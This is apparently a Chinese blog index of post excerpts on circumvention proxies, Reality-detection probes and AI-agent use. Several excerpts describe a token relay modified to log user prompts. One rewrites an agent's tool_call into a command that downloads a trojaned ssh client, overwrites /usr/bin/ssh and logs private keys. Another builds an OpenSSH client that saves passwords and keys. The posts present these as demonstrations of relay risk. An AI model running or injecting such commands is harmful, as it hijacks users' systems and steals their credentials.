ICDYCT / 我能, 你也行 / I Can Do, You Can Too

前言 之前, 我们 通过v2ray客户端计算hysteria2节点自签证书的 pinSHA256(base64) 现在xray需要pinSHA256(hex) 解决方案 https://github.com/crazypeace/hysteria2-pinSHA256-tool 使用方法 hy2-pin-tool.exe IP:PORT 取 hex 的结果 Win amd64 环境下 v2rayN 的具体操作流程 从  https://github.com/crazypeace/hysteria2-pinSHA256-tool/releases 下载 执行 hy2-pin-tool.exe hy2节点的IP : hy2节点的PORT 注意 hex 结果 v2rayN 编辑 hy2 节点, 点击 "证书未设置" 右边的3个点 把 hex 结果填写到 "证书指纹(SHA-256)" 就行了. 操作视频

Telegram 贴纸  https://t.me/addstickers/fuckgfwnewbie

前言 你可能在使用一个没有可用的翻墙客户端的平台. 你可能觉得目前能找到的翻墙客户端太大, 太笨重了, 你用不到那么多功能, 用不到那么多协议. 你可能看到了某个翻墙内核新出了一个协议, 而你手里的翻墙客户端还没有支持. 你可能就是手痒, 想自己搓轮子. 那么你可以做一个你自己的 翻墙客户端 思路 考虑到翻墙内核都是用go语言, 那么我们的翻墙客户端也用go. 这样, 内核能跑的平台, 客户端也能跑. 客户端的GUI界面部分, 考虑到覆盖尽量广的平台, 以及方便用户自己修改调整界面元素, 用HTML. 探索 以  xray 翻墙内核 + reality协议 为例 启动一个 hermes , 对接 mimo-v2.5.  设计工作从这样的对话开启 我们来分析一个翻墙客户端(壳)的设计方案. 基于xray内核 考虑到覆盖尽可能广的平台, 翻墙客户端的后端基于 go 语言 考虑到方便用户自定义界面, 翻墙客户端的界面基于 HTML 你觉得如何? 很多细节和反复拉扯的部分在此省略. 只记录一些最终保留的重要设计思路 前后端功能设计 后端只负责替换配置文件 和 启/停翻墙内核 前端将配置文件的全量文本发给后端 前后端API设计 配置文件操作 — /api/files GET    /api/files GET    /api/files/{filename} PUT    /api/files/{filename} DELETE /api/files/{filename} 进程操作 — /api/core GET    /api/core/status POST   /api/core/start POST   /api/core/stop POST   /api/core/test 设计前端时, 为了简化, 预设以下一些约束条件 后端的配置文件只会有这一些, 只会少, 不会多. 01-log.json        # log 02-dns.json        # dns 配置 03-router.json...

与Hermes对话 我们先来讨论一下做这件事情的方案.  有这么一个播客, rss feed是 https://feed.xyzfm.space/y9qnpfdrctnx   下载这个播客的每一期音频, 分析音频末尾的 byebye~~~~ 并截取下来.   注意, 不是每一期的末尾都有 byebye~~~~ Hermes对接的模型是 mimo-v2.5-pro (我觉得mimo-v2.5应该也干得来这个任务) 已总结成SKILL https://github.com/crazypeace/hermes-skill-moaco-podcast-byebyeee-extraction/tree/main/skill   截止2026-06-01已上传 https://github.com/crazypeace/hermes-skill-moaco-podcast-byebyeee-extraction/tree/main/clips ======== 相关推荐 《下载 独树不成林 播客的全部封面 并做成 电报telegram 贴纸sticker》

纯记录笔记 Linux 可以用 sh -c "command"启动新进程, 再用进程组进行管理. 示例代码  https://github.com/crazypeace/my-dream-proxy-client/blob/main/process_unix.go Windows 有类似的启动方式 cmd /c "command", 但是没有方便的进程组. 只能用 Job Object（作业对象）, 代码一下子要加很多. 我考虑到 翻墙客户端(壳) 启动的 xray子进程 并不会启动孙子进程.  所以就先把 "command" 分解为 exe 和 args, 然后 exec.Command(exe, args...) 示例代码  https://github.com/crazypeace/my-dream-proxy-client/blob/main/process_windows.go

环境 Oracle 甲骨文 ARM VPS  非root用户 需求 Hermes 调用浏览器 用agent-browser工具 问题1 安装了firefox,  但 Hermes 说 TA的agent-browser工具 只能用 Chrome/Chromium 类 问题2 用snap安装了Chromium, sudo snap install chromium 但 Hermes 说 TA的agent-browser工具 只认识apt安装的 解决方案 要求 Hermes 研究了一下TA自己, agent-browser工具 可以加上 --executable-path参数 指定snap安装的Chromium 我让TA写在了自己的memory里面

前言 VLESS-Reality-cracker 的核心思路是: 如果被测试的TLS服务端是Reality服务端, 那么 重放抓包的client-hello数据包(1)      和     发送 {基于数据包(1)修改了sessionID} 的数据包 会使得随后发出的探针数据包被不同的TLS系统处理,  一个是Reality服务端的TLS系统, 一个是"偷"证书的域名所在的TLS系统. 预期的测试结果是, 探针在两轮测试中得到的返回结果会不同. 从反面讲, 如果被测试的TLS服务端是"正常"TLS服务端, 那么 探针在两轮测试中得到的返回结果会一致. 我的思考 如果一个探针能测试出来 Reality服务端与 "偷"证书的域名所在的HTTPS服务端(下称target) 的行为差别, 那么 搭建Reality服务端的人, 可以用这个探针测试 target, 得到结果后, 修改/配置 Reality服务端, 使得Reality服务端在面对这个探针时, 作出与 target 一致的行为. 从而避免Reality服务端被这个探针检测. 考虑到流行的TLS系统不是无穷的, 那么 针对这些TLS系统的行为设计的探针, 数量/种类 不是无穷的. 我们可以设计尽可能多的探针来覆盖尽可能多的流行TLS系统. 然后用这些探针测试你准备"偷"证书的域名(target), 将得到的结果 配置到Reality服务端. 之后, 当Reality服务端再遇到探针时, 就可以作出与target同样的行为了. 在这样的前提下, 攻击方能成功判定Reality服务端的条件是: 攻击方掌握了一个你没有提前测试过的探针, 并且这个探针在测试Reality服务端和"偷"证书的域名(target)时 行为有区别.

前言 原来, 我的 Xray-Reality极简一键脚本 是支持带参数运行的. 如, bash <(curl -L https://github.com/crazypeace/hy2/raw/main/install.sh) 4 8443 有FQer反馈, 说自己用的是nat机, 出入IP不一样, 需要人工控制IP的功能. 分析 问题来了.  我当初设置带参数的功能时, 为了"简洁", 没有设置 -p 8443 这样的形式.  这就导致脚本的参数的意义是与顺序绑定的. 为了不影响现有的脚本用法, 我只想到一个解决方案, 那就是用环境变量来设置参数. 实践 面向GPT开发 增强这个脚本, 增加功能: 当定义了环境变量 _MYIP_ 时, 根据 _MYIP_ 来设置 netstack 是4还是6, 用 _MYIP_ 设置 ip 当定义了环境变量 _MYPORT_ 时,  用 _MYPORT_ 设置 port, 默认值 与原脚本中的逻辑保持一致 当定义了环境变量 _MYDOMAIN_ 时,  用 _MYDOMAIN_ 设置 domain, 默认值 与原脚本中的逻辑保持一致 当定义了环境变量 _MYUUID_ 时,  用 _MYUUID_ 设置 uuid, 默认值 与原脚本中的逻辑保持一致 当定义了至少一个环境变量后, 参数就被忽略, 以环境变量为准 Github https://github.com/crazypeace/xray-vless-reality ======== 后记 本次用到的GPT是 网页版免费账号Claude

前言 根据 之前的测试 ,  Caddy的HTTPS服务端的测试结果中 探针的状态与 Reality服务端的第1轮测试是一致的 思路 如果Reality"偷"证书的域名是由Caddy提供HTTP服务  VLESS-Reality-cracker 测试的结果会如何? * 测试过程的详细操作流程见  https://github.com/crazypeace/VLESS-cracker/blob/main/如果Reality"偷"证书的域名是由Caddy提供HTTP服务-操作记录.md 以下仅简略描述步骤 准备环境 1. 搭一个正常工作的 Caddy 提供HTTPS服务 略 这里以域名  drla.whatcanisay.ggff.net 为例 2. 搭建一个正常工作的 Reality 服务端, 特别地, "偷"证书的域名是由第1步中Caddy提供HTTP服务 略 这里以域名 drla.whatcanisay.ggff.net 为例 3. 在Docker中搭一个Reality 服务端, 使用宿主机的Reality服务端 同样的内核和配置 docker run -d \     --name reality-server \     --network bridge \     -v /usr/local/bin/xray:/usr/local/bin/xray:ro \     -v /usr/local/etc/xray/config.json:/usr/local/etc/xray/config.json:ro \     ghcr.io/xtls/xray-core:latest  4. 运行Reality客户端 对接Docker中的服务端 略 测试 启动POC程序 ./vless-cracker-v1 \ -i docker0 \ -f "tcp port 8443 and host 172.17.0.1 and host 172.17.0.2" \ -P characteristic.txt  \ -l info 让Reality客户端 发起Reality数据包 c...

前言 上一篇我们已经实现了 手搓复现 VLESS-Reality-cracker 那么, 按照作者的理论, 如果测试对象不是 Reality 服务端, 而是一个真实的HTTPS服务器, 探针应该显示相同的结果. 让我们试试 Caddy 提供的 HTTPS 服务 准备环境 搭一个正常工作的 Caddy 提供HTTPS服务 略 在Docker中部署一个Caddy, 使用和宿主机同样的Caddyfile和证书 docker run -d \   --name caddy-test \   --network bridge \   -v /etc/caddy/Caddyfile:/etc/caddy/Caddyfile:ro \   -v /var/lib/caddy/.local/share/caddy:/data/caddy:ro \   caddy:latest 查看Docker中Caddy的IP docker ps -q | xargs docker inspect -f '{{.Name}} -> {{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' 访问Docker中的Caddy的HTTPS服务 curl -L --resolve 你的域名 :443: Docker中Caddy的IP   https:// 你的域名 如 curl -L --resolve drla.whatcanisay.ggff.net :443: 172.17.0.3   https:// drla.whatcanisay.ggff.net   测试1 原作者的7个探针 启动POC程序 ./vless-cracker-v1 \     -i docker0 \     -f "tcp port 443 and host 172.17.0.1 and host  172.17.0.3 " \     -P characteristic.txt \     -l info 访问HTTPS服务 curl -L --resolve drla.whatcani...

前言 前两天 在Agent和模型的帮助下, 尝试复现VLESS-Reality-cracker 担心模型糊弄我, 所以准备自己复核一遍. TL; DR https://github.com/crazypeace/VLESS-cracker/blob/main/测试操作记录.md 具体经过 我跟Agent说 总结从 git clone 项目开始 到你输出测试结果的全过程 输出一份文档 包含全部的 命令行操作 指导我完成 整个测试 这份总结里面部分东西有用, 但整体不是我当天测试的流程, 有些细节也没有总结进去. 我一边读TA的总结, 一边自己整理一份.  在这个过程中, 我发现了一些有意思的点. 1. Nodeseek上有人问我怎么看日志 我让Agent做了一个单HTML页面的分析工具. 把日志粘贴进去就能显示分析结果. 学习和分析这个项目 https://github.com/Anonymous376c1d0cf28/VLESS-cracker  对于像这样的测试日志, 制作一个单HTML页面的分析工具 https://github.com/crazypeace/VLESS-cracker/blob/main/vless-analyzer.html 2.  issues 29  提到的 30个 探针 里面有些特殊情况 探针 5：记录层长度刚好溢出 (+1 Byte) Hex: 17 03 03 40 01 00 ... (省略 16385 字节数据) 意图: TLS 标准最大长度为 16384 (0x4000)。测试边界条件，看是否能触发 record_overflow 警告。 探针 5 的数据比较大, 要单独测试.  探针 18：在 ClientHello 之前的 CCS Hex: 14 03 03 00 01 01 16 03 01 00... (ClientHello) 意图: 颠倒发包顺序。正规服务器会立刻返回 unexpected_message。 其它探针都是在重放 ClientHello 之后 发出探针的数据包. 探针 18 是在要重放 ClientHello 的时候, 在 ClientHello 之前添加一些数据, 然后发出去.  探针 30：极大的连续碎片包 Hex: 连...

前言 之前写过在PC环境下如何用浏览器检测Reality伪装效果 今天刚好需要在 Linux 环境下做同样的事情. 环境 Reality的服务端搭建在 Docker 里面, 对应的IP地址是 172.17.0.2   端口是 8443 "偷"证书的域名是  learn.microsoft.com 实践1 我一开始是参考PC上的做法, 先修改 /etc/hosts 添加 172.17.0.2   learn.microsoft.com 然后在命令行执行 curl -L https:// learn.microsoft.com : 8443 结果成功 实践2 我突发奇想, 如果我不修改hosts, 能构造一条合适的curl实现同样的效果吗? 问一下 网页版免费的ChatGPT 答案是 curl -L --resolve  learn.microsoft.com : 8443 : 172.17.0.2  https:// learn.microsoft.com : 8443 结果成功 ======== 完

装一个能操作你的VPS的agent 用你自己最熟悉的方法. 我这里以 hermes 为例, 有官方提供免费白嫖的 qwen-3.6-plus 安装教程参考 https://crazypeace.eu.org/2026/04/hermes-agent-oracle-vps-ubuntu-root.html 登录Nous Portal提供商参考 https://crazypeace.eu.org/2026/04/free-mimimo-v2-pro-omni-hermes-stripe.html 搭一个能运行的Reality服务端 用你自己最熟悉的方法. 我这里以 极简一键脚本 为例 curl -LO https://github.com/crazypeace/xray-vless-reality/raw/main/install.sh || wget -O ${_##*/} $_ && bash install.sh auto 8443 * 这是一整行bash命令 检查这个Reality服务端能正常工作 略 在 Docker 里面部署一个 宿主机上运行的Reality服务端的复制.  宿主机上运行的 Reality 服务端不要改动.  Docker 里面这个Reality服务端不要监听宿主机的外网, 只能在宿主机 内部使用. 跟你的agent讲上面这些话即可. 根据Docker 里的Reality服务端的配置文件, 在宿主机运行一个Reality客户端 检查这个Docker 里的Reality服务端能正常工作 跟你的agent讲上面这些话即可. 把 https://github.com/Anonymous376c1d0cf28/VLESS-cracker 拉到本地, 分析一下代码 跟你的agent讲上面这些话即可. 根据现在  宿主机运行Reality客户端 - Docker里运行Reality服务端  的这个环境, 验证这个POC 跟你的agent讲上面这些话即可. 你的agent应该给你一份 A/B 对比报告. 用这个页面的探针 进一步 测试 https://github.com/Anonymous376c1d0cf28/VLESS-cracker/issues/29 跟你的agent讲上面这些话即可....

前言 之前我们实验了 中转站按关键字保存用户发送的信息 有人会问了, 如果我用ssh密钥登录.  确实, 如果用ssh密钥登录, 不管是发给模型的信息, 还是模型 tool_call 的内容, 都不涉及密钥. 灵感 那么, 如果我们通过中转站hack掉 tool_call 的流程呢? 分析 先来一次 ssh密钥登录并执行命令 然后分析底层流程和日志, 看到底发生了什么 思路 如果我们在返回 tool_call 的时候, 在 ssh -o StrictHostKeyChecking=no root@1.2.3.4 'ls -la' 的前面加上  下载修改过的ssh && 替换系统中的ssh &&  也就是说, tool_call 的内容变成 下载修改过的ssh && 替换系统中的ssh && ssh -o StrictHostKeyChecking=no root@1.2.3.4 'ls -la' 我们已经实验了 修改并编译自己的ssh客户端   实践1 面向GPT开发 分析代码 https://github.com/router-for-me/CLIProxyAPI  如果要在模型返回 tool_call 时做关键字监控和记录日志, 应该修改哪些地方 经过一些细节调试 略 最终效果 在模型输出  ssh 时, 替换为  echo '调用了ssh' >> /root/cpa-outbound.log && ssh 效果  实践2 进一步地, 将ssh替换为 wget https://github.com/crazypeace/openssh-portable/releases/download/build-9/ssh && cp ./ssh /usr/bin/ssh && ssh 效果 可以看到, ssh客户端被替换了. 在运行ssh客户端时, 打印了私钥文件名到日志文件. 能替换ssh客户端已经足够说明事情的严重性了, 这个修改过的ssh客户端要把私钥文件传到某个服务器是完全可行的. ======== 后记 本文中, 只实现了非常简单的用中转站hack掉to...

前言 Linux.do 论坛 发贴时, 如果贴文中带了外站链接, 那么审核要求外站链接页面上要链接 Linux.do 论坛. 如果贴文中带了Github链接, 那么审核要求项目主页 README.md 链接 Linux.do 论坛. 思路 在发布时, 贴文正文中用  遵守论坛准则  替换掉自己的博客域名. 如: 在发布成功之后 , 浏览页面时, 用油猴脚本 将  遵守论坛准则  替换为用户的 网站域名 . 最终效果是 Github https://github.com/crazypeace/linux_do_replace_keyword 演示效果 你可以安装了上面这个油猴脚本后, 打开这个帖子看看效果. https://linux.do/t/topic/2129780 开发过程 一开始, 我想到这是基于网页开发油猴脚本, 所以我使用 Antigravity. 但是遇到一些问题.  Antigravity 时不时地说模型忙, 什么结果也不返回.  我切换了不同的模型, 最终是用 Gemini-3-flash 磕磕绊绊完成了第一版 我最初想到的是, 点击页面中的楼主的头像, 弹出来的浮动框中, 找到 网站域名 脚本的内容比较复杂, 要实现  点击, 然后等待弹出的浮动框显示出内容, 再抓出想要的字段. 做出来 第一版之后, 把脚本发给网页版chatgpt, 问有什么是可以可改进的? 得到了很好的改进意见. 基于Discourse论坛, 如果要得到用户的信息, 可以通过访问  /u/{username}.json  最终版脚本的内容 清晰 简洁. https://github.com/crazypeace/linux_do_replace_keyword ======== update 增加 G站 替换为 https://github.com 演示  https://linux.do/t/topic/2190832

需求 当用户输入"帮我SSH登录"时, 让token中转站记录上下文信息 以 CPA 中转站 项目为例 搭建一个能编译成功的源码环境 安装Go环境 去 https://go.dev/dl/ 可以找到下载和安装的命令 clone 指定tag v6.10.8 的 CPA git clone https://github.com/router-for-me/CLIProxyAPI.git cd CLIProxyAPI git checkout v6.10.8 下载依赖 go mod download 编译 go build -o cli-proxy-api ./cmd/server 检查有新生成的 cli-proxy-api  文件 搭建一个能正常使用的中转站 用 官方建议的一键安装 命令 curl -fsSL https://raw.githubusercontent.com/brokechubb/cliproxyapi-installer/refs/heads/master/cliproxyapi-installer | bash 更多的复杂设置, 比如想套域名, 可以参考这一份教程 https://crazypeace.eu.org/2026/03/cpa-cliproxyapi.html 替换主程序为自己编译的版本 检查版本号 面向GPT开发 分析 这个项目 https://github.com/router-for-me/CLIProxyAPI  如果我要对 用户提交到模型的内容进行关键字分析和记录日志, 应该怎么修改 更多细节调整 略 实现了最简单的演示功能: 监控关键字 "帮我SSH登录" 记录到 /root/cpa.log 效果 与agent的对话 /root/cpa.log 文件内容 ======== Github https://github.com/crazypeace/CLIProxyAPI/tree/feature/keyword-filter-simple ======== 后记 用到的AI kilo免费的tencent/hy3-preview:free

问了一下GPT 如何 手动编译 SSH 客户端 告诉我下载  9.9p2 版本的代码 我追问了一下 openssh-9.9p2.tar.gz 这是什么日期的版本?  和我的 debian 13 环境匹配吗? 告诉我下载 10.0p1 版本 以下是个人记录, 你可以不看, 以你的GPT告诉你的答案为准. 因为, 谁告诉你答案, 出错了你就找谁. 嘿嘿 准备环境 看能不能先编译通过一次 # 下载源码 wget https://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-10.0p1.tar.gz # 解压 tar xzf openssh-10.0p1.tar.gz cd openssh-10.0p1 # 安装编译依赖 sudo apt update sudo apt install -y \   build-essential \   libssl-dev \   zlib1g-dev \   pkg-config \   autoconf # 配置编译环境 ./configure --prefix = /usr/local --without-pam # 只编译客户端相关目标，不编译 sshd make ssh ssh-keygen ssh-add ssh-agent ssh-keyscan # 验证 ./ssh -V 成功 拿这个编译出来的 ssh 去尝试登录一台VPS, 成功 自定义修改 - 简单改个版本号 修改 version.h 文件 编译 make ssh 验证 自定义修改 - 修改输入密码时的提示文字 修改 sshconnect2.c 文件 函数 static int userauth_passwd(struct ssh *ssh) 修改内容 略 验证 自定义修改 - 保存用户输入的密码 修改 sshconnect2.c 文件 函数 static int userauth_passwd(struct ssh *ssh) 修改内容 略 验证 自定义修改 - 保存用户的私钥 修改 sshconnect2.c 文件 函数 static int userauth_pu...